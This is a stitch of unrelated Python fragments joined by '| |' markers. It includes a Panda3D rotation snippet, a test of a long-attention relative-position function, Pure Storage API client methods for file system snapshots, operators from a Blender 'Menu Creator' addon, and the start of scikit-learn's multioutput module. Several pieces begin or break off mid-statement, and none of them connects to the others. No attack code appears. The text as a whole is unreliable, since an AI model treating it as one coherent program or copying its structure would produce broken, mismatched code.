hpr = VBase3()
hpr["zxy".index(axis_constraints)] = angle
rotation.set_hpr(hpr)
if (snap_on and snap_tgt_type != "increment" and snap_target_point
| |
1, 2, 3], #
[0, 1, 2, 3], #
[0, 1, 2, 3], #
[-1, 0, 1, 2], #
[-1, 0, 1, 2], #
[-1, 0, 1, 2], #
[-2, -1, 0, 1], #
[-2, -1, 0, 1], #
[-2, -1, 0, 1], #
[-3, -2, -1, 0], #
[-3, -2, -1, 0], #
[-3, -2, -1, 0]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-3, -2, -1, x], #
[x, x, x, x], #
[x, x, x, x]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[x, x, x, 0], #
[x, x, x, 0], #
[x, x, x, 0]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[x, x, 0, x], #
[x, x, 0, x], #
[x, x, 0, x], #
[x, x, -1, x]
]
]) #
positions_to_compare = np.isfinite(expected_relative_positions)
np.testing.assert_array_equal(
side_relative_positions[positions_to_compare],
expected_relative_positions[positions_to_compare])
inputs_mask = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
],
dtype=np.bool_)
segment_ids = [
[1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3], #
[1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 3, 3, 3, 3, 0, 0], #
[1, 1, 2, 3, 3, 4, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
]
positions = [
[0, 1, 2, 3, 4, 5, 6, 0, 1, 2, 3, 4, 5, 0, 1, 2], #
[0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 0, 1, 2, 3, 0, 0], #
[0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 2, 3, 4, 5, 6, 7], #
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15] #
]
side_relative_positions = long_attention._make_side_relpos(
tokens_per_block,
inputs_mask,
segment_ids,
positions,
adopt_orphan_tokens=True)
expected_relative_positions = np.array([
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
], #
[
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x]
], #
[
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3]
], #
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
]
]) #
positions_to_compare = np.isfinite(expected_relative_positions)
np.testing.assert_array_equal(
side_relative_positions[positions_to_compare],
expected_relative_positions[positions_to_compare])
side_relative_positions = long_attention._make_side_relpos(
tokens_per_block,
inputs_mask,
segment_ids,
positions,
adopt_orphan_tokens=False)
expected_relative_positions = np.array([
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
], #
[
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-2, -1, x, x, x], #
[-2, -1, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, -1, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x]
], #
[
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2]
], #
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-5, -4, -3, | |
`items` list will be empty.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
ids=ids,
limit=limit,
names_or_owner_names=names_or_owner_names,
offset=offset,
remote_ids=remote_ids,
remote_names=remote_names,
sort=sort,
total_only=total_only,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_replica_links_api.api20_file_system_replica_links_transfer_get_with_http_info
_process_references(references, ['ids'], kwargs)
_process_references(names_or_owners, ['names_or_owner_names'], kwargs)
_process_references(remotes, ['remote_ids', 'remote_names'], kwargs)
return self._call_api(endpoint, kwargs)
def delete_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
ids=None, # type: List[str]
names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""
Delete a file system snapshot.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
ids=ids,
names=names,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_delete_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
names_or_owners=None, # type: List[models.ReferenceType]
owners=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
destroyed=None, # type: bool
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names_or_owner_names=None, # type: List[str]
offset=None, # type: int
owner_ids=None, # type: List[str]
sort=None, # type: List[str]
total_only=None, # type: bool
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.FileSystemSnapshotGetResponse
"""
List file system snapshots.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids keyword arguments.
names_or_owners (list[FixedReference], optional):
A list of names_or_owners to query for. Overrides names_or_owner_names keyword arguments.
owners (list[FixedReference], optional):
A list of owners to query for. Overrides owner_ids keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
destroyed (bool, optional):
If set to `true`, lists only destroyed objects that are in the eradication
pending state. If set to `false`, lists only objects that are not destroyed. If
not set, lists both objects that are destroyed and those that are not destroyed.
If object name(s) are specified in the `names` parameter, then each object
referenced must exist. If `destroyed` is set to `true`, then each object
referenced must also be destroyed. If `destroyed` is set to `false`, then each
object referenced must also not be destroyed. An error is returned if any of
these conditions are not met.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names_or_owner_names (list[str], optional):
A list of resource names. Either the names of the snapshots or the owning file
systems.
offset (int, optional):
The offset of the first resource to return from a collection.
owner_ids (list[str], optional):
A list of owning file system IDs. If after filtering, there is not at least one
resource that matches each of the elements of owner IDs, then an error is
returned. This cannot be provided together with the `ids`,
`names_or_owner_names`, or `names_or_sources` query parameters.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
total_only (bool, optional):
Only return the total record for the specified items. The total record will be
the total of all items after filtering. The `items` list will be empty.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
destroyed=destroyed,
filter=filter,
ids=ids,
limit=limit,
names_or_owner_names=names_or_owner_names,
offset=offset,
owner_ids=owner_ids,
sort=sort,
total_only=total_only,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_get_with_http_info
_process_references(references, ['ids'], kwargs)
_process_references(names_or_owners, ['names_or_owner_names'], kwargs)
_process_references(owners, ['owner_ids'], kwargs)
return self._call_api(endpoint, kwargs)
def patch_file_system_snapshots(
self,
references=None, # type: List[models.ReferenceType]
file_system_snapshot=None, # type: models.FileSystemSnapshot
ids=None, # type: List[str]
latest_replica=None, # type: bool
names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.FileSystemSnapshotResponse
"""
Modify file system snapshot attributes.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
file_system_snapshot (FileSystemSnapshot, required):
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
latest_replica (bool, optional):
Used when destroying a snapshot. If not present or `false`, and the snapshot is
the latest replicated snapshot, then destroy will fail. If `true` or the
snapshot is not the latest replicated snapshot, then destroy will be successful.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
file_system_snapshot=file_system_snapshot,
ids=ids,
latest_replica=latest_replica,
names=names,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._file_system_snapshots_api.api20_file_system_snapshots_patch_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def delete_file_system_snapshots_policies(
self,
members=None, # type: List[models.ReferenceType]
policies=None, # type: List[models.ReferenceType]
member_ids=None, # type: List[str]
member_names=None, # type: List[str]
policy_ids=None, # type: List[str]
policy_names=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""
Remove snapshot scheduling policies from a file system.
Args:
members | |
import bpy
from . import mcdata
from .mcutils import *
from .mccolutils import *
# Operator to add the right click button on properties
class MC_AddProperty(bpy.types.Operator):
"""Add the property to the menu"""
bl_idname = "mc.add_property"
bl_label = "Add property to Menu"
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
#if hasattr(context, 'button_pointer'):
# btn = context.button_pointer
# dump(btn, 'button_pointer')
if hasattr(context, 'button_prop'):
prop = context.button_prop
#dump(prop, 'button_prop')
try:
bpy.ops.ui.copy_data_path_button(full_path=True)
except:
self.report({'WARNING'}, 'Menu Creator - Invalid selection.')
return {'FINISHED'}
rna, path = split_path(context.window_manager.clipboard)
if obj.mc_enable:
if mc_add_property_item(obj.mc_properties, [prop.name,rna,path]):
self.report({'INFO'}, 'Menu Creator - Property added to the \'' + obj.name + '\' menu.')
else:
self.report({'WARNING'}, 'Menu Creator - Property of \'' + obj.name + '\' was already added.')
else:
self.report({'ERROR'}, 'Menu Creator - Can not add property \'' + obj.name + '\'. No menu has been initialized.')
#if hasattr(context, 'button_operator'):
# op = context.button_operator
# dump(op, 'button_operator')
return {'FINISHED'}
# Operator to link a property to another one
class MC_LinkProperty(bpy.types.Operator):
"""Link the selected property to this one"""
bl_idname = "mc.link_property"
bl_label = "Link Property"
prop_id: bpy.props.StringProperty()
prop_path: bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
if hasattr(context, 'button_prop'):
prop = context.button_prop
#dump(prop, 'button_prop')
try:
bpy.ops.ui.copy_data_path_button(full_path=True)
except:
self.report({'WARNING'}, 'Menu Creator - Invalid selection.')
return {'FINISHED'}
rna, path = split_path(context.window_manager.clipboard)
if obj.mc_enable:
i = mc_find_index(obj.mc_properties, ['',self.prop_path,self.prop_id])
prop_type = type(eval(obj.mc_properties[i].path + '.' + obj.mc_properties[i].id))
if '].[' in rna + '.' + path:
link_type = type(eval(rna + path))
else:
link_type = type(eval(rna + '.' + path))
if prop_type == link_type:
already_added = False
for el in obj.mc_properties[i].linked_props:
if el.path == rna and el.id == path:
already_added = True
break
if not already_added:
add_item = obj.mc_properties[i].linked_props.add()
add_item.id = path
add_item.path = rna
self.report({'INFO'}, 'Menu Creator - Property \'' + path + '\' linked to \'' + obj.mc_properties[i].name + '\'')
else:
self.report({'WARNING'}, 'Menu Creator - Property \'' + path + '\' already linked to \'' + obj.mc_properties[i].name + '\'')
else:
self.report({'ERROR'}, 'Menu Creator - Property \'' + path + '\' can not be linked to \'' + obj.mc_properties[i].name + '\'')
if settings.ms_debug:
print('MenuCreator - Property \'' + path + '\' can not be linked to \'' + obj.mc_properties[i].name + '\'')
print(' Data types are ' + str(link_type) + ' and ' + str(prop_type) + '.')
else:
self.report({'ERROR'}, 'Menu Creator - Can not link property in \'' + obj.name + '\'. No menu has been initialized.')
return {'FINISHED'}
# Operator to add the collection to the selected section
class MC_AddCollection(bpy.types.Operator):
"""Add the collection to the selected section"""
bl_idname = "mc.add_collection"
bl_label = "Add collection to Menu"
section: bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
add_coll = bpy.context.collection
sec_index = mc_find_index_section(obj.mc_sections, self.section)
i=True
for el in obj.mc_sections[sec_index].collections:
if el.collection == add_coll:
i=False
break
if i:
add_item = obj.mc_sections[sec_index].collections.add()
add_item.collection = add_coll
self.report({'INFO'}, 'Menu Creator - Collection has been added to section \''+self.section+'\'.')
else:
self.report({'WARNING'}, 'Menu Creator - Collection was already added to section \''+self.section+'\'.')
return {'FINISHED'}
# Operator to clean all properties and sections from all objects
class MC_CleanAll(bpy.types.Operator):
"""Clean all the menus.\nIf you choose reset, it will also delete all Menu options from all objects"""
bl_idname = "mc.cleanprop"
bl_label = "Clean all the properties"
reset : bpy.props.BoolProperty(default=False)
def execute(self, context):
mc_clean_properties()
mc_clean_sections()
if self.reset:
for obj in bpy.data.objects:
obj.mc_enable = False
self.report({'INFO'}, 'Menu Creator - All the objects has been reset.')
return {'FINISHED'}
# Operator to clean all properties and sections from an objects. If reset is on, it will also disable the menu for that object
class MC_CleanObject(bpy.types.Operator):
"""Clean all the object properties.\nIf you choose reset, it will also delete all Menu options from the object"""
bl_idname = "mc.cleanpropobj"
bl_label = "Clean the object"
reset : bpy.props.BoolProperty(default=False)
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
mc_clean_single_properties(obj)
mc_clean_single_sections(obj)
if self.reset:
obj.mc_enable = False
self.report({'INFO'}, 'Menu Creator - \'' + obj.name + '\' menu has been reset.')
return {'FINISHED'}
# Operator to remove a linked property (button in UI)
class MC_RemoveLinkedProperty(bpy.types.Operator):
"""Remove the linked property"""
bl_idname = "mc.removelinkedproperty"
bl_label = ""
prop_index : bpy.props.IntProperty()
link_path : bpy.props.StringProperty()
link_id : bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
props = obj.mc_properties
i=-1
for el in obj.mc_properties[self.prop_index].linked_props:
i=i+1
if el.path == self.link_path and el.id == self.link_id:
break
if i>=0:
obj.mc_properties[self.prop_index].linked_props.remove(i)
return {'FINISHED'}
# Single Property settings
class MC_PropertySettings(bpy.types.Operator):
"""Modify some of the property settings"""
bl_idname = "mc.propsettings"
bl_label = "Property settings"
bl_icon = "PREFERENCES"
bl_options = {'UNDO'}
name : bpy.props.StringProperty(name='Name',
description="Choose the name of the property")
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
icon : bpy.props.EnumProperty(name='Icon',
description="Choose the icon.\nNote that the icon name MUST respect Blender convention. All the icons can be found in the Icon Viewer default Blender addon.",items=mcdata.mc_icon_list)
section : bpy.props.EnumProperty(name='Section',
description="Choose the section of the property",items=mc_section_list)
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
i = mc_find_index(obj.mc_properties,[self.name,self.path,self.id])
if i>=0:
obj.mc_properties[i].name = self.name
obj.mc_properties[i].icon = self.icon
obj.mc_properties[i].section = self.section
return {'FINISHED'}
def invoke(self, context, event):
settings = bpy.context.scene.mc_settings
if settings.ms_debug:
return context.window_manager.invoke_props_dialog(self, width=650)
else:
return context.window_manager.invoke_props_dialog(self, width=550)
def draw(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
i = mc_find_index(obj.mc_properties,[self.name,self.path,self.id])
layout = self.layout
layout.prop(self, "name")
layout.prop(self, "icon")
layout.prop(self, "section")
layout.separator()
layout.label(text="Property info", icon="INFO")
box = layout.box()
box.label(text="Identifier: "+self.id)
if settings.ms_debug:
layout.label(text="Full path", icon="RNA")
box = layout.box()
box.label(text=self.path+'.'+self.id)
if len(obj.mc_properties[i].linked_props)>0:
layout.separator()
layout.label(text="Linked Properties", icon="LINKED")
box = layout.box()
for prop in obj.mc_properties[i].linked_props:
row = box.row()
row.label(text=prop.path + '.' + prop.id, icon="DOT")
link_del_op = row.operator(MC_RemoveLinkedProperty.bl_idname, icon="X")
link_del_op.prop_index = i
link_del_op.link_id = prop.id
link_del_op.link_path = prop.path
# Swap Properties Operator
class MC_SwapProperty(bpy.types.Operator):
"""Change the position of the property"""
bl_idname = "mc.swapprops"
bl_label = "Change the property position"
mod : bpy.props.BoolProperty(default=False) # False = down, True = Up
name : bpy.props.StringProperty()
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
col = sorted(obj.mc_properties, key = mc_prop_ID)
col_len = mc_len_collection(col)
i = mc_find_index(col,[self.name,self.path,self.id])
if i>=0:
if self.mod:
j=i
while j>0:
j = j - 1
if col[j].section==col[i].section:
break
if j>-1:
col[i].mc_id = j
col[j].mc_id = i
else:
j=i
while j<col_len-1:
j=j+1
if col[j].section==col[i].section:
break
if j<col_len:
col[i].mc_id = j
col[j].mc_id = i
return {'FINISHED'}
# Operator to remove a property (button in UI)
class MC_RemoveProperty(bpy.types.Operator):
"""Remove the property from the current menu"""
bl_idname = "mc.removeproperty"
bl_label = "Remove the property"
path : bpy.props.StringProperty()
id : bpy.props.StringProperty()
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
settings = bpy.context.scene.mc_settings
if settings.em_fixobj:
obj = settings.em_fixobj_pointer
else:
obj = context.active_object
props = obj.mc_properties
mc_remove_property_item(obj.mc_properties,['',self.path,self.id])
return {'FINISHED'}
# Operator to add a new section
class MC_AddSection(bpy.types.Operator):
"""Add a new section to the section list."""
bl_idname = "mc.addsection"
bl_label = "Add section"
bl_icon = "PREFERENCES"
bl_options = {'UNDO'}
name : bpy.props.StringProperty(name='Name',
description="Choose the name of the section", default = "Section")
icon : bpy.props.EnumProperty(name='Icon',
description="Choose the icon.\nNote that the icon name MUST respect Blender convention. All the icons can be found in the Icon Viewer default Blender addon",items=mcdata.mc_icon_list)
collapsable : bpy.props.BoolProperty(name="Collapsable",
description="Add a collapse button near the name of the section")
type : bpy.props.EnumProperty(name='Type',
description="Choose the section type",items=mcdata.mc_section_type_list)
| |
"""
This module implements multioutput regression and classification.
The estimators provided in this module are meta-estimators: they require
a base estimator to be provided in their constructor. The meta-estimator
extends single output estimators to multioutput estimators.
"""
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
# Author: <NAME>
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import numpy as np
import scipy.sparse as sp
from joblib import Parallel, delayed
from abc import ABCMeta, abstractmethod
from .base import BaseEstimator, clone, MetaEstimatorMixin
from .base import RegressorMixin, ClassifierMixin, is_classifier
from .model_selection import cross_val_predict
from .utils import check_array, check_X_y, check_random_state
from .utils.metaestimators import if_delegate_has_method
from .utils.validation import (check_is_fitted, has_fit_parameter,
_check_fit_params, _deprecate_positional_args)
from .utils.multiclass import check_classification_targets
from .utils import deprecated
__all__ = ["MultiOutputRegressor", "MultiOutputClassifier",
"ClassifierChain", "RegressorChain"]
def _fit_estimator(estimator, X, y, sample_weight=None, **fit_params):
estimator = clone(estimator)
if sample_weight is not None:
estimator.fit(X, y, sample_weight=sample_weight, **fit_params)
else:
estimator.fit(X, y, **fit_params)
return estimator
def _partial_fit_estimator(estimator, X, y, classes=None, sample_weight=None,
first_time=True):
if first_time:
estimator = clone(estimator)
if sample_weight is not None:
if classes is not None:
estimator.partial_fit(X, y, classes=classes,
sample_weight=sample_weight)
else:
estimator.partial_fit(X, y, sample_weight=sample_weight)
else:
if classes is not None:
estimator.partial_fit(X, y, classes=classes)
else:
estimator.partial_fit(X, y)
return estimator
class _MultiOutputEstimator(BaseEstimator, MetaEstimatorMixin,
metaclass=ABCMeta):
@abstractmethod
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
self.estimator = estimator
self.n_jobs = n_jobs
@if_delegate_has_method('estimator')
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incrementally fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets.
classes : list of numpy arrays, shape (n_outputs)
Each array is unique classes for one output in str/int
Can be obtained by via
``[np.unique(y[:, i]) for i in range(y.shape[1])]``, where y is the
target matrix of the entire dataset.
This argument is required for the first call to partial_fit
and can be omitted in the subsequent calls.
Note that y doesn't need to contain all labels in `classes`.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
Returns
-------
self : object
"""
X, y = check_X_y(X, y,
multi_output=True,
accept_sparse=True)
if y.ndim == 1:
raise ValueError("y must have at least two dimensions for "
"multi-output regression but has only one.")
if (sample_weight is not None and
not has_fit_parameter(self.estimator, 'sample_weight')):
raise ValueError("Underlying estimator does not support"
" sample weights.")
first_time = not hasattr(self, 'estimators_')
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_partial_fit_estimator)(
self.estimators_[i] if not first_time else self.estimator,
X, y[:, i],
classes[i] if classes is not None else None,
sample_weight, first_time) for i in range(y.shape[1]))
return self
def fit(self, X, y, sample_weight=None, **fit_params):
""" Fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets. An indicator matrix turns on multilabel
estimation.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
**fit_params : dict of string -> object
Parameters passed to the ``estimator.fit`` method of each step.
Returns
-------
self : object
"""
if not hasattr(self.estimator, "fit"):
raise ValueError("The base estimator should implement"
" a fit method")
X, y = self._validate_data(X, y, multi_output=True, accept_sparse=True)
if is_classifier(self):
check_classification_targets(y)
if y.ndim == 1:
raise ValueError("y must have at least two dimensions for "
"multi-output regression but has only one.")
if (sample_weight is not None and
not has_fit_parameter(self.estimator, 'sample_weight')):
raise ValueError("Underlying estimator does not support"
" sample weights.")
fit_params_validated = _check_fit_params(X, fit_params)
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_estimator)(
self.estimator, X, y[:, i], sample_weight,
**fit_params_validated)
for i in range(y.shape[1]))
return self
def predict(self, X):
"""Predict multi-output variable using a model
trained for each target variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
Returns
-------
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets predicted across multiple predictors.
Note: Separate models are generated for each predictor.
"""
check_is_fitted(self)
